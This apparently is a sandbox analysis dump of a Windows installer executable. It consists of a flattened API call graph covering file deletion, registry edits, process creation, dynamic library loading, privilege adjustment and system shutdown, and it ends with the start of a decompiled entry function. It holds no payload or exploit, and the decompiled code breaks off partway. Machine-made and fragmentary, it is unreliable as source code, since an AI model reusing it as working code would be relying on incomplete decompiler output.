API calls 3968->3972 3971 404a38 3969->3971 3985 4042f6 KiUserCallbackDispatcher 3970->3985 3974 404a4d SetDlgItemTextA 3971->3974 3975 404a3d 3971->3975 3972->3970 3974->3968 3977 404b1d 20 API calls 3975->3977 3976 404a8a 3976->3978 3986 4046bf 3976->3986 3977->3968 3978->3934 3980->3924 3981->3951 3982->3932 3983->3952 3984->3960 3985->3976 3987 4046d2 SendMessageA 3986->3987 3988 4046cd 3986->3988 3987->3978 3988->3987 3989 402766 3990 40276c 3989->3990 3991 402774 FindClose 3990->3991 3992 402ac5 3990->3992 3991->3992 3993 4023e8 3994 402c39 17 API calls 3993->3994 3995 4023f9 3994->3995 3996 402c39 17 API calls 3995->3996 3997 402402 3996->3997 3998 402c39 17 API calls 3997->3998 3999 40240c GetPrivateProfileStringA 3998->3999 4000 4027e8 4001 402c39 17 API calls 4000->4001 4002 4027f4 4001->4002 4003 40280a 4002->4003 4005 402c39 17 API calls 4002->4005 4004 405dc5 2 API calls 4003->4004 4006 402810 4004->4006 4005->4003 4028 405dea GetFileAttributesA CreateFileA 4006->4028 4008 40281d 4009 4028d9 4008->4009 4010 4028c1 4008->4010 4011 402838 GlobalAlloc 4008->4011 4012 4028e0 DeleteFileA 4009->4012 4013 4028f3 4009->4013 4015 403143 31 API calls 4010->4015 4011->4010 4014 402851 4011->4014 4012->4013 4029 40336b SetFilePointer 4014->4029 4017 4028ce CloseHandle 4015->4017 4017->4009 4018 402857 4019 403355 ReadFile 4018->4019 4020 402860 GlobalAlloc 4019->4020 4021 402870 4020->4021 4022 4028aa 4020->4022 4024 403143 31 API calls 4021->4024 4023 405e91 WriteFile 4022->4023 4025 4028b6 GlobalFree 4023->4025 4027 40287d 4024->4027 4025->4010 4026 4028a1 GlobalFree 4026->4022 4027->4026 4028->4008 4029->4018 3017 40166a 3018 402c39 17 API calls 3017->3018 3019 401671 3018->3019 3020 402c39 17 API calls 3019->3020 3021 40167a 3020->3021 3022 402c39 17 API calls 3021->3022 3023 401683 MoveFileA 3022->3023 3024 401696 3023->3024 3025 40168f 3023->3025 3029 4022ea 3024->3029 3031 4065ce FindFirstFileA 3024->3031 3026 401423 24 API calls 3025->3026 3026->3029 3032 
4065e4 FindClose 3031->3032 3033 4016a5 3031->3033 3032->3033 3033->3029 3034 406030 MoveFileExA 3033->3034 3035 406044 3034->3035 3037 406051 3034->3037 3038 405ec0 3035->3038 3037->3025 3039 405ee6 3038->3039 3040 405f0c GetShortPathNameA 3038->3040 3065 405dea GetFileAttributesA CreateFileA 3039->3065 3042 405f21 3040->3042 3043 40602b 3040->3043 3042->3043 3045 405f29 wsprintfA 3042->3045 3043->3037 3044 405ef0 CloseHandle GetShortPathNameA 3044->3043 3046 405f04 3044->3046 3047 4062ea 17 API calls 3045->3047 3046->3040 3046->3043 3048 405f51 3047->3048 3066 405dea GetFileAttributesA CreateFileA 3048->3066 3050 405f5e 3050->3043 3051 405f6d GetFileSize GlobalAlloc 3050->3051 3052 406024 CloseHandle 3051->3052 3053 405f8f 3051->3053 3052->3043 3067 405e62 ReadFile 3053->3067 3058 405fc2 3060 405d4f 4 API calls 3058->3060 3059 405fae lstrcpyA 3061 405fd0 3059->3061 3060->3061 3062 406007 SetFilePointer 3061->3062 3074 405e91 WriteFile 3062->3074 3065->3044 3066->3050 3068 405e80 3067->3068 3068->3052 3069 405d4f lstrlenA 3068->3069 3070 405d90 lstrlenA 3069->3070 3071 405d98 3070->3071 3072 405d69 lstrcmpiA 3070->3072 3071->3058 3071->3059 3072->3071 3073 405d87 CharNextA 3072->3073 3073->3070 3075 405eaf GlobalFree 3074->3075 3075->3052 4030 4052ec 4031 405310 4030->4031 4032 4052fc 4030->4032 4035 405318 IsWindowVisible 4031->4035 4041 40532f 4031->4041 4033 405302 4032->4033 4034 405359 4032->4034 4037 404320 SendMessageA 4033->4037 4036 40535e CallWindowProcA 4034->4036 4035->4034 4038 405325 4035->4038 4039 40530c 4036->4039 4037->4039 4040 404c27 5 API calls 4038->4040 4040->4041 4041->4036 4042 404ca7 4 API calls 4041->4042 4042->4034 4043 4019ed 4044 402c39 17 API calls 4043->4044 4045 4019f4 4044->4045 4046 402c39 17 API calls 4045->4046 4047 4019fd 4046->4047 4048 401a04 lstrcmpiA 4047->4048 4049 401a16 lstrcmpA 4047->4049 4050 401a0a 4048->4050 4049->4050 4051 40156f 4052 401586 4051->4052 4053 40157f ShowWindow 4051->4053 4054 401594 ShowWindow 
4052->4054 4055 402ac5 4052->4055 4053->4052 4054->4055 3176 402173 3177 402c39 17 API calls 3176->3177 3178 40217a 3177->3178 3179 402c39 17 API calls 3178->3179 3180 402184 3179->3180 3181 402c39 17 API calls 3180->3181 3182 40218e 3181->3182 3183 402c39 17 API calls 3182->3183 3184 40219b 3183->3184 3185 402c39 17 API calls 3184->3185 3186 4021a5 3185->3186 3187 4021e7 CoCreateInstance 3186->3187 3188 402c39 17 API calls 3186->3188 3191 402206 3187->3191 3193 4022b4 3187->3193 3188->3187 3189 401423 24 API calls 3190 4022ea 3189->3190 3192 402294 MultiByteToWideChar 3191->3192 3191->3193 3192->3193 3193->3189 3193->3190 4056 4022f3 4057 402c39 17 API calls 4056->4057 4058 4022f9 4057->4058 4059 402c39 17 API calls 4058->4059 4060 402302 4059->4060 4061 402c39 17 API calls 4060->4061 4062 40230b 4061->4062 4063 4065ce 2 API calls 4062->4063 4064 402314 4063->4064 4065 402325 lstrlenA lstrlenA 4064->4065 4066 402318 4064->4066 4067 405378 24 API calls 4065->4067 4068 405378 24 API calls 4066->4068 4070 402320 4066->4070 4069 402361 SHFileOperationA 4067->4069 4068->4070 4069->4066 4069->4070 4071 4014f4 SetForegroundWindow 4072 402ac5 4071->4072 3500 402675 3501 402c17 17 API calls 3500->3501 3505 40267f 3501->3505 3502 4026ed 3503 405e62 ReadFile 3503->3505 3504 4026ef 3509 4061b5 wsprintfA 3504->3509 3505->3502 3505->3503 3505->3504 3506 4026ff 3505->3506 3506->3502 3508 402715 SetFilePointer 3506->3508 3508->3502 3509->3502 4073 4029f6 4074 402a49 4073->4074 4075 4029fd 4073->4075 4076 406663 5 API calls 4074->4076 4078 402c17 17 API calls 4075->4078 4083 402a47 4075->4083 4077 402a50 4076->4077 4080 402c39 17 API calls 4077->4080 4079 402a0b 4078->4079 4081 402c17 17 API calls 4079->4081 4082 402a59 4080->4082 4085 402a1a 4081->4085 4082->4083 4091 4062aa 4082->4091 4090 4061b5 wsprintfA 4085->4090 4086 402a67 4086->4083 4095 406294 4086->4095 4090->4083 4092 4062b5 4091->4092 4093 4062d8 IIDFromString 4092->4093 4094 4062d1 4092->4094 4093->4086 4094->4086 
4098 406279 WideCharToMultiByte 4095->4098 4097 402a88 CoTaskMemFree 4097->4083 4098->4097 4099 401ef9 4100 402c39 17 API calls 4099->4100 4101 401eff 4100->4101 4102 402c39 17 API calls 4101->4102 4103 401f08 4102->4103 4104 402c39 17 API calls 4103->4104 4105 401f11 4104->4105 4106 402c39 17 API calls 4105->4106 4107 401f1a 4106->4107 4108 401423 24 API calls 4107->4108 4109 401f21 4108->4109 4116 405933 ShellExecuteExA 4109->4116 4111 401f5c 4113 4027c8 4111->4113 4117 4066d8 WaitForSingleObject 4111->4117 4114 401f76 CloseHandle 4114->4113 4116->4111 4118 4066f2 4117->4118 4119 406704 GetExitCodeProcess 4118->4119 4120 40669f 2 API calls 4118->4120 4119->4114 4121 4066f9 WaitForSingleObject 4120->4121 4121->4118 4122 401f7b 4123 402c39 17 API calls 4122->4123 4124 401f81 4123->4124 4125 405378 24 API calls 4124->4125 4126 401f8b 4125->4126 4127 4058f0 2 API calls 4126->4127 4128 401f91 4127->4128 4129 4066d8 5 API calls 4128->4129 4132 4027c8 4128->4132 4134 401fb2 CloseHandle 4128->4134 4131 401fa6 4129->4131 4131->4134 4135 4061b5 wsprintfA 4131->4135 4134->4132 4135->4134 4136 401ffb 4137 402c39 17 API calls 4136->4137 4138 402002 4137->4138 4139 406663 5 API calls 4138->4139 4140 402011 4139->4140 4141 402029 GlobalAlloc 4140->4141 4142 402099 4140->4142 4141->4142 4143 40203d 4141->4143 4144 406663 5 API calls 4143->4144 4145 402044 4144->4145 4146 406663 5 API calls 4145->4146 4147 40204e 4146->4147 4147->4142 4151 4061b5 wsprintfA 4147->4151 4149 402089 4152 4061b5 wsprintfA 4149->4152 4151->4149 4152->4142 4153 4039fb 4154 403a06 4153->4154 4155 403a0a 4154->4155 4156 403a0d GlobalAlloc 4154->4156 4156->4155 4157 4018fd 4158 401934 4157->4158 4159 402c39 17 API calls 4158->4159 4160 401939 4159->4160 4161 405a19 67 API calls 4160->4161 4162 401942 4161->4162 3736 40247e 3737 402c39 17 API calls 3736->3737 3738 402490 3737->3738 3739 402c39 17 API calls 3738->3739 3740 40249a 3739->3740 3753 402cc9 3740->3753 3743 402ac5 3744 4024cf 3745 4024db 
3744->3745 3748 402c17 17 API calls 3744->3748 3749 4024fd RegSetValueExA 3745->3749 3750 403143 31 API calls 3745->3750 3746 402c39 17 API calls 3747 4024c8 lstrlenA 3746->3747 3747->3744 3748->3745 3751 402513 RegCloseKey 3749->3751 3750->3749 3751->3743 3754 402ce4 3753->3754 3757 40610b 3754->3757 3758 40611a 3757->3758 3759 4024aa 3758->3759 3760 406125 RegCreateKeyExA 3758->3760 3759->3743 3759->3744 3759->3746 3760->3759 4163 401cfe 4164 402c17 17 API calls 4163->4164 4165 401d04 IsWindow 4164->4165 4166 401a0e 4165->4166 4167 401000 4168 401037 BeginPaint GetClientRect 4167->4168 4169 40100c DefWindowProcA 4167->4169 4171 4010f3 4168->4171 4172 401179 4169->4172 4173 401073 CreateBrushIndirect FillRect DeleteObject 4171->4173 4174 4010fc 4171->4174 4173->4171 4175 401102 CreateFontIndirectA 4174->4175 4176 401167 EndPaint 4174->4176 4175->4176 4177 401112 6 API calls 4175->4177 4176->4172 4177->4176 4178 401900 4179 402c39 17 API calls 4178->4179 4180 401907 4179->4180 4181 40596d MessageBoxIndirectA 4180->4181 4182 401910 4181->4182 4183 402780 4184 402786 4183->4184 4185 40278a FindNextFileA 4184->4185 4186 40279c 4184->4186 4185->4186 4187 4027db 4185->4187 4189 406257 lstrcpynA 4187->4189 4189->4186 4190 401502 4191 40150a 4190->4191 4193 40151d 4190->4193 4192 402c17 17 API calls 4191->4192 4192->4193 4194 40440a lstrcpynA lstrlenA 4195 40298a 4196 402c17 17 API calls 4195->4196 4197 402990 4196->4197 4198 4062ea 17 API calls 4197->4198 4199 4027c8 4197->4199 4198->4199 4200 40260c 4201 402c39 17 API calls 4200->4201 4202 402613 4201->4202 4205 405dea GetFileAttributesA CreateFileA 4202->4205 4204 40261f 4205->4204 3076 402590 3077 402c79 17 API calls 3076->3077 3078 40259a 3077->3078 3079 402c17 17 API calls 3078->3079 3080 4025a3 3079->3080 3081 4025b1 3080->3081 3082 4027c8 3080->3082 3083 4025ca RegEnumValueA 3081->3083 3084 4025be RegEnumKeyA 3081->3084 3085 4025df 3083->3085 3086 4025e6 RegCloseKey 3083->3086 3084->3086 3085->3086 3086->3082 4206 
401490 4207 405378 24 API calls 4206->4207 4208 401497 4207->4208 3702 40239b 3703 4023b2 3702->3703 3704 4023ac 3702->3704 3706 4023c2 3703->3706 3707 402c39 17 API calls 3703->3707 3705 402c39 17 API calls 3704->3705 3705->3703 3708 4023d0 3706->3708 3709 402c39 17 API calls 3706->3709 3707->3706 3710 402c39 17 API calls 3708->3710 3709->3708 3711 4023d9 WritePrivateProfileStringA 3710->3711 3732 40159d 3733 402c39 17 API calls 3732->3733 3734 4015a4 SetFileAttributesA 3733->3734 3735 4015b6 3734->3735 4209 40149d 4210 4014ab PostQuitMessage 4209->4210 4211 40238f 4209->4211 4210->4211 3761 40251e 3762 402c79 17 API calls 3761->3762 3763 402528 3762->3763 3764 402c39 17 API calls 3763->3764 3765 402531 3764->3765 3766 40253b RegQueryValueExA 3765->3766 3769 4027c8 3765->3769 3767 402561 RegCloseKey 3766->3767 3768 40255b 3766->3768 3767->3769 3768->3767 3772 4061b5 wsprintfA 3768->3772 3772->3767 4212 401a1e 4213 402c39 17 API calls 4212->4213 4214 401a27 ExpandEnvironmentStringsA 4213->4214 4215 401a3b 4214->4215 4217 401a4e 4214->4217 4216 401a40 lstrcmpA 4215->4216 4215->4217 4216->4217 3773 40171f 3774 402c39 17 API calls 3773->3774 3775 401726 SearchPathA 3774->3775 3776 401741 3775->3776 4223 40471f 4224 404755 4223->4224 4225 40472f 4223->4225 4226 40433b 8 API calls 4224->4226 4227 4042d4 18 API calls 4225->4227 4228 404761 4226->4228 4229 40473c SetDlgItemTextA 4227->4229 4229->4224 4230 401c1f 4231 402c17 17 API calls 4230->4231 4232 401c35 4231->4232 4233 402c17 17 API calls 4232->4233 4234 401c42 4233->4234 4235 402c39 17 API calls 4234->4235 4237 401c57 4234->4237 4235->4237 4236 401c67 4239 401c72 4236->4239 4240 401cbe 4236->4240 4237->4236 4238 402c39 17 API calls 4237->4238 4238->4236 4241 402c17 17 API calls 4239->4241 4242 402c39 17 API calls 4240->4242 4243 401c77 4241->4243 4244 401cc3 4242->4244 4245 402c17 17 API calls 4243->4245 4246 402c39 17 API calls 4244->4246 4247 401c83 4245->4247 4248 401ccc FindWindowExA 4246->4248 4249 401c90 
SendMessageTimeoutA 4247->4249 4250 401cae SendMessageA 4247->4250 4251 401cea 4248->4251 4249->4251 4250->4251 4252 401d1f 4253 402c17 17 API calls 4252->4253 4254 401d26 4253->4254 4255 402c17 17 API calls 4254->4255 4256 401d32 GetDlgItem 4255->4256 4257 402628 4256->4257 4258 402aa0 SendMessageA 4259 402ac5 4258->4259 4260 402aba InvalidateRect 4258->4260 4260->4259 2924 4020a5 2925 4020b7 2924->2925 2935 402165 2924->2935 2942 402c39 2925->2942 2928 401423 24 API calls 2931 4022ea 2928->2931 2929 402c39 17 API calls 2930 4020c7 2929->2930 2932 4020dc LoadLibraryExA 2930->2932 2933 4020cf GetModuleHandleA 2930->2933 2934 4020ec GetProcAddress 2932->2934 2932->2935 2933->2932 2933->2934 2936 402138 2934->2936 2937 4020fb 2934->2937 2935->2928 2951 405378 2936->2951 2940 40210b 2937->2940 2948 401423 2937->2948 2940->2931 2941 402159 FreeLibrary 2940->2941 2941->2931 2943 402c45 2942->2943 2944 4062ea 17 API calls 2943->2944 2945 402c66 2944->2945 2946 4020be 2945->2946 2947 406535 5 API calls 2945->2947 2946->2929 2947->2946 2949 405378 24 API calls 2948->2949 2950 401431 2949->2950 2950->2940 2952 405393 2951->2952 2961 405436 2951->2961 2953 4053b0 lstrlenA 2952->2953 2954 4062ea 17 API calls 2952->2954 2955 4053d9 2953->2955 2956 4053be lstrlenA 2953->2956 2954->2953 2958 4053ec 2955->2958 2959 4053df SetWindowTextA 2955->2959 2957 4053d0 lstrcatA 2956->2957 2956->2961 2957->2955 2960 4053f2 SendMessageA SendMessageA SendMessageA 2958->2960 2958->2961 2959->2958 2960->2961 2961->2940 4261 402e25 4262 402e34 SetTimer 4261->4262 4263 402e4d 4261->4263 4262->4263 4264 402ea2 4263->4264 4265 402e67 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4263->4265 4265->4264 2972 402429 2973 402430 2972->2973 2974 40245b 2972->2974 2988 402c79 2973->2988 2976 402c39 17 API calls 2974->2976 2977 402462 2976->2977 2984 402cf7 2977->2984 2980 402441 2982 402c39 17 API calls 2980->2982 2981 40246f 2983 402448 RegDeleteValueA RegCloseKey 2982->2983 2983->2981 2985 402d0a 
2984->2985 2986 402d03 2984->2986 2985->2986 2993 402d3b 2985->2993 2986->2981 2989 402c39 17 API calls 2988->2989 2990 402c90 2989->2990 2991 4060dd RegOpenKeyExA 2990->2991 2992 402437 2991->2992 2992->2980 2992->2981 2994 4060dd RegOpenKeyExA 2993->2994 2995 402d69 2994->2995 2996 402d73 2995->2996 2997 402e1e 2995->2997 2998 402d79 RegEnumValueA 2996->2998 3003 402d9c 2996->3003 2997->2986 2999 402e03 RegCloseKey 2998->2999 2998->3003 2999->2997 3000 402dd8 RegEnumKeyA 3001 402de1 RegCloseKey 3000->3001 3000->3003 3008 406663 GetModuleHandleA 3001->3008 3003->2999 3003->3000 3003->3001 3005 402d3b 6 API calls 3003->3005 3005->3003 3006 402e13 3006->2997 3007 402df5 RegDeleteKeyA 3007->2997 3009 406689 GetProcAddress 3008->3009 3010 40667f 3008->3010 3011 402df1 3009->3011 3014 4065f5 GetSystemDirectoryA 3010->3014 3011->3006 3011->3007 3013 406685 3013->3009 3013->3011 3015 406617 wsprintfA LoadLibraryExA 3014->3015 3015->3013 4266 4027aa 4267 402c39 17 API calls 4266->4267 4268 4027b1 FindFirstFileA 4267->4268 4269 4027d4 4268->4269 4273 4027c4 4268->4273 4270 4027db 4269->4270 4274 4061b5 wsprintfA 4269->4274 4275 406257 lstrcpynA 4270->4275 4274->4270 4275->4273 4276 40262e 4277 402633 4276->4277 4278 402647 4276->4278 4279 402c17 17 API calls 4277->4279 4280 402c39 17 API calls 4278->4280 4282 40263c 4279->4282 4281 40264e lstrlenA 4280->4281 4281->4282 4283 402670 4282->4283 4284 405e91 WriteFile 4282->4284 4284->4283 3088 401932 3089 401934 3088->3089 3090 402c39 17 API calls 3089->3090 3091 401939 3090->3091 3094 405a19 3091->3094 3135 405cd7 3094->3135 3097 405a41 DeleteFileA 3099 401942 3097->3099 3098 405a58 3101 405b90 3098->3101 3149 406257 lstrcpynA 3098->3149 3101->3099 3107 4065ce 2 API calls 3101->3107 3102 405a7e 3103 405a91 3102->3103 3104 405a84 lstrcatA 3102->3104 3150 405c30 lstrlenA 3103->3150 3105 405a97 3104->3105 3108 405aa5 lstrcatA 3105->3108 3109 405a9c 3105->3109 3110 405baa 3107->3110 3112 405ab0 lstrlenA FindFirstFileA 3108->3112 
3109->3108 3109->3112 3110->3099 3111 405bae 3110->3111 3163 405be9 lstrlenA CharPrevA 3111->3163 3114 405b86 3112->3114 3126 405ad4 3112->3126 3114->3101 3116 405c14 CharNextA 3116->3126 3117 4059d1 5 API calls 3118 405bc0 3117->3118 3119 405bc4 3118->3119 3120 405bda 3118->3120 3119->3099 3125 405378 24 API calls 3119->3125 3123 405378 24 API calls 3120->3123 3121 405b65 FindNextFileA 3124 405b7d FindClose 3121->3124 3121->3126 3123->3099 3124->3114 3127 405bd1 3125->3127 3126->3116 3126->3121 3130 405a19 60 API calls 3126->3130 3132 405378 24 API calls 3126->3132 3133 405378 24 API calls 3126->3133 3134 406030 36 API calls 3126->3134 3154 406257 lstrcpynA 3126->3154 3155 4059d1 3126->3155 3128 406030 36 API calls 3127->3128 3131 405bd8 3128->3131 3130->3126 3131->3099 3132->3121 3133->3126 3134->3126 3166 406257 lstrcpynA 3135->3166 3137 405ce8 3167 405c82 CharNextA CharNextA 3137->3167 3140 405a39 3140->3097 3140->3098 3141 406535 5 API calls 3144 405cfe 3141->3144 3142 405d29 lstrlenA 3143 405d34 3142->3143 3142->3144 3146 405be9 3 API calls 3143->3146 3144->3140 3144->3142 3145 4065ce 2 API calls 3144->3145 3148 405c30 2 API calls 3144->3148 3145->3144 3147 405d39 GetFileAttributesA 3146->3147 3147->3140 3148->3142 3149->3102 3151 405c3d 3150->3151 3152 405c42 CharPrevA 3151->3152 3153 405c4e 3151->3153 3152->3151 3152->3153 3153->3105 3154->3126 3173 405dc5 GetFileAttributesA 3155->3173 3158 4059fe 3158->3126 3159 4059f4 DeleteFileA 3161 4059fa 3159->3161 3160 4059ec RemoveDirectoryA 3160->3161 3161->3158 3162 405a0a SetFileAttributesA 3161->3162 3162->3158 3164 405c03 lstrcatA 3163->3164 3165 405bb4 3163->3165 3164->3165 3165->3117 3166->3137 3168 405c9d 3167->3168 3171 405cad 3167->3171 3170 405ca8 CharNextA 3168->3170 3168->3171 3169 405ccd 3169->3140 3169->3141 3170->3169 3171->3169 3172 405c14 CharNextA 3171->3172 3172->3171 3174 4059dd 3173->3174 3175 405dd7 SetFileAttributesA 3173->3175 3174->3158 3174->3159 3174->3160 3175->3174 3194 4033b3 
SetErrorMode GetVersionExA 3195 403444 3194->3195 3196 403405 GetVersionExA 3194->3196 3198 4034c8 3195->3198 3199 406663 5 API calls 3195->3199 3196->3195 3197 403421 3196->3197 3197->3195 3200 4065f5 3 API calls 3198->3200 3199->3198 3201 4034de lstrlenA 3200->3201 3201->3198 3202 4034ee 3201->3202 3203 406663 5 API calls 3202->3203 3204 4034f5 3203->3204 3205 406663 5 API calls 3204->3205 3206 4034fc 3205->3206 3207 406663 5 API calls 3206->3207 3208 403508 #17 OleInitialize SHGetFileInfoA 3207->3208 3286 406257 lstrcpynA 3208->3286 3211 403556 GetCommandLineA 3287 406257 lstrcpynA 3211->3287 3213 403568 3214 405c14 CharNextA 3213->3214 3215 40358f CharNextA 3214->3215 3224 40359e 3215->3224 3216 403664 3217 403678 GetTempPathA 3216->3217 3288 403382 3217->3288 3219 403690 3221 403694 GetWindowsDirectoryA lstrcatA 3219->3221 3222 4036ea DeleteFileA 3219->3222 3220 405c14 CharNextA 3220->3224 3225 403382 12 API calls 3221->3225 3298 402f0c GetTickCount GetModuleFileNameA 3222->3298 3224->3216 3224->3220 3226 403666 3224->3226 3228 4036b0 3225->3228 3382 406257 lstrcpynA 3226->3382 3227 4036fd 3231 403782 3227->3231 3236 405c14 CharNextA 3227->3236 3282 403792 3227->3282 3228->3222 3230 4036b4 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3228->3230 3233 403382 12 API calls 3230->3233 3326 403a3d 3231->3326 3234 4036e2 3233->3234 3234->3222 3234->3282 3238 403717 3236->3238 3247 4037c1 3238->3247 3248 40375c 3238->3248 3239 4037ac 3392 40596d 3239->3392 3240 4038cf 3242 4038d7 GetCurrentProcess OpenProcessToken 3240->3242 3243 40394d ExitProcess 3240->3243 3244 40391d 3242->3244 3245 4038ee LookupPrivilegeValueA AdjustTokenPrivileges 3242->3245 3250 406663 5 API calls 3244->3250 3245->3244 3396 4058d8 3247->3396 3251 405cd7 18 API calls 3248->3251 3253 403924 3250->3253 3254 403768 3251->3254 3258 403939 ExitWindowsEx 3253->3258 3261 403946 3253->3261 3254->3282 3383 406257 lstrcpynA 3254->3383 3256 4037e2 lstrcatA lstrcmpiA 3260 4037fe 
3256->3260 3256->3282 3257 4037d7 lstrcatA 3257->3256 3258->3243 3258->3261 3263 403803 3260->3263 3264 40380a 3260->3264 3412 40140b 3261->3412 3262 403777 3384 406257 lstrcpynA 3262->3384 3399 40583e CreateDirectoryA 3263->3399 3404 4058bb CreateDirectoryA 3264->3404 3270 40380f SetCurrentDirectoryA 3271 40382a 3270->3271 3272 40381f 3270->3272 3408 406257 lstrcpynA 3271->3408 3407 406257 lstrcpynA 3272->3407 3275 4062ea 17 API calls 3276 40386c DeleteFileA 3275->3276 3277 40387a CopyFileA 3276->3277 3278 403837 3276->3278 3277->3278 3278->3275 3279 4038c3 3278->3279 3280 406030 36 API calls 3278->3280 3283 4062ea 17 API calls 3278->3283 3285 4038ae CloseHandle 3278->3285 3409 4058f0 CreateProcessA 3278->3409 3281 406030 36 API calls 3279->3281 3280->3278 3281->3282 3385 403963 3282->3385 3283->3278 3285->3278 3286->3211 3287->3213 3289 406535 5 API calls 3288->3289 3291 40338e 3289->3291 3290 403398 3290->3219 3291->3290 3292 405be9 3 API calls 3291->3292 3293 4033a0 3292->3293 3294 4058bb 2 API calls 3293->3294 3295 4033a6 3294->3295 3296 405e19 2 API calls 3295->3296 3297 4033b1 3296->3297 3297->3219 3415 405dea GetFileAttributesA CreateFileA 3298->3415 3300 402f4c 3318 402f5c 3300->3318 3416 406257 lstrcpynA 3300->3416 3302 402f72 3303 405c30 2 API calls 3302->3303 3304 402f78 3303->3304 3417 406257 lstrcpynA 3304->3417 3306 402f83 GetFileSize 3307 40307d 3306->3307 3325 402f9a 3306->3325 3418 402ea8 3307->3418 3309 403086 3311 4030b6 GlobalAlloc 3309->3311 3309->3318 3453 40336b SetFilePointer 3309->3453 3429 40336b SetFilePointer 3311->3429 3313 4030e9 3315 402ea8 6 API calls 3313->3315 3315->3318 3316 40309f 3319 403355 ReadFile 3316->3319 3317 4030d1 3430 403143 3317->3430 3318->3227 3321 4030aa 3319->3321 3321->3311 3321->3318 3322 402ea8 6 API calls 3322->3325 3323 4030dd 3323->3318 3323->3323 3324 40311a SetFilePointer 3323->3324 3324->3318 3325->3307 3325->3313 3325->3318 3325->3322 3450 403355 3325->3450 3327 406663 5 API calls 3326->3327 3328 403a51 
3327->3328 3329 403a57 3328->3329 3330 403a69 3328->3330 3474 4061b5 wsprintfA 3329->3474 3331 40613e 3 API calls 3330->3331 3332 403a94 3331->3332 3334 403ab2 lstrcatA 3332->3334 3336 40613e 3 API calls 3332->3336 3335 403a67 3334->3335 3459 403d02 3335->3459 3336->3334 3339 405cd7 18 API calls 3340 403ae4 3339->3340 3341 403b6d 3340->3341 3343 40613e 3 API calls 3340->3343 3342 405cd7 18 API calls 3341->3342 3344 403b73 3342->3344 3345 403b10 3343->3345 3346 403b83 LoadImageA 3344->3346 3347 4062ea 17 API calls 3344->3347 3345->3341 3350 403b2c lstrlenA 3345->3350 3353 405c14 CharNextA 3345->3353 3348 403c29 3346->3348 3349 403baa RegisterClassA 3346->3349 3347->3346 3352 40140b 2 API calls 3348->3352 3351 403be0 SystemParametersInfoA CreateWindowExA 3349->3351 3381 403c33 3349->3381 3354 403b60 3350->3354 3355 403b3a lstrcmpiA 3350->3355 3351->3348 3356 403c2f 3352->3356 3358 403b2a 3353->3358 3357 405be9 3 API calls 3354->3357 3355->3354 3359 403b4a GetFileAttributesA 3355->3359 3360 403d02 18 API calls 3356->3360 3356->3381 3361 403b66 3357->3361 3358->3350 3362 403b56 3359->3362 3363 403c40 3360->3363 3475 406257 lstrcpynA 3361->3475 3362->3354 3365 405c30 2 API calls 3362->3365 3366 403c4c ShowWindow 3363->3366 3367 403ccf 3363->3367 3365->3354 3369 4065f5 3 API calls 3366->3369 3467 40544a OleInitialize 3367->3467 3371 403c64 3369->3371 3370 403cd5 3372 403cf1 3370->3372 3373 403cd9 3370->3373 3374 403c72 GetClassInfoA 3371->3374 3376 4065f5 3 API calls 3371->3376 3375 40140b 2 API calls 3372->3375 3379 40140b 2 API calls 3373->3379 3373->3381 3377 403c86 GetClassInfoA RegisterClassA 3374->3377 3378 403c9c DialogBoxParamA 3374->3378 3375->3381 3376->3374 3377->3378 3380 40140b 2 API calls 3378->3380 3379->3381 3380->3381 3381->3282 3382->3217 3383->3262 3384->3231 3386 40397b 3385->3386 3387 40396d CloseHandle 3385->3387 3487 4039a8 3386->3487 3387->3386 3390 405a19 67 API calls 3391 40379a OleUninitialize 3390->3391 3391->3239 3391->3240 3393 405982 
3392->3393 3394 4037b9 ExitProcess 3393->3394 3395 405996 MessageBoxIndirectA 3393->3395 3395->3394 3397 406663 5 API calls 3396->3397 3398 4037c6 lstrcatA 3397->3398 3398->3256 3398->3257 3400 403808 3399->3400 3401 40588f GetLastError 3399->3401 3400->3270 3401->3400 3402 40589e SetFileSecurityA 3401->3402 3402->3400 3403 4058b4 GetLastError 3402->3403 3403->3400 3405 4058cb 3404->3405 3406 4058cf GetLastError 3404->3406 3405->3270 3406->3405 3407->3271 3408->3278 3410 405923 CloseHandle 3409->3410 3411 40592f 3409->3411 3410->3411 3411->3278 3413 401389 2 API calls 3412->3413 3414 401420 3413->3414 3414->3243 3415->3300 3416->3302 3417->3306 3419 402eb1 3418->3419 3420 402ec9 3418->3420 3421 402ec1 3419->3421 3422 402eba DestroyWindow 3419->3422 3423 402ed1 3420->3423 3424 402ed9 GetTickCount 3420->3424 3421->3309 3422->3421 3454 40669f 3423->3454 3426 402ee7 CreateDialogParamA ShowWindow 3424->3426 3427 402f0a 3424->3427 3426->3427 3427->3309 3429->3317 3431 403159 3430->3431 3432 403187 3431->3432 3458 40336b SetFilePointer 3431->3458 3434 403355 ReadFile 3432->3434 3435 403192 3434->3435 3436 4031a4 GetTickCount 3435->3436 3437 4032ee 3435->3437 3439 4032d8 3435->3439 3436->3439 3446 4031f3 3436->3446 3438 403330 3437->3438 3443 4032f2 3437->3443 3441 403355 ReadFile 3438->3441 3439->3323 3440 403355 ReadFile 3440->3446 3441->3439 3442 403355 ReadFile 3442->3443 3443->3439 3443->3442 3444 405e91 WriteFile 3443->3444 3444->3443 3445 403249 GetTickCount 3445->3446 3446->3439 3446->3440 3446->3445 3447 40326e MulDiv wsprintfA 3446->3447 3449 405e91 WriteFile 3446->3449 3448 405378 24 API calls 3447->3448 3448->3446 3449->3446 3451 405e62 ReadFile 3450->3451 3452 403368 3451->3452 3452->3325 3453->3316 3455 4066bc PeekMessageA 3454->3455 3456 4066b2 DispatchMessageA 3455->3456 3457 402ed7 3455->3457 3456->3455 3457->3309 3458->3432 3460 403d16 3459->3460 3476 4061b5 wsprintfA 3460->3476 3462 403d87 3477 403dbb 3462->3477 3464 403ac2 3464->3339 3465 403d8c 

Control-flow Graph (legend: Executed, Not Executed)
C-Code - Quality: 85%
_entry_() {
	CHAR* _v8;
	long _v12;
	char _v16;
	long _v20;
	void* _v24;
	int _v28;
	struct _TOKEN_PRIVILEGES _v40;
	signed int _v42;
	long _v44;
	signed int _v48;
	char _v163;
	char _v175;
	signed short _v182;
	struct _OSVERSIONINFOA _v196;
	struct _SHFILEINFOA _v548;
	intOrPtr* _t87;
	CHAR* _t91;
	char* _t93;
	void* _t95;
	void* _t99;
	CHAR* _t101;
	signed int _t103;
	int _t106;
	void* _t107;
	int _t108;
	void* _t110;
	void* _t134;
	signed int _t150;
	void* _t153;
	void* _t158;
	intOrPtr* _t159;
	void* _t170;
	char* _t171;
	CHAR* _t173;
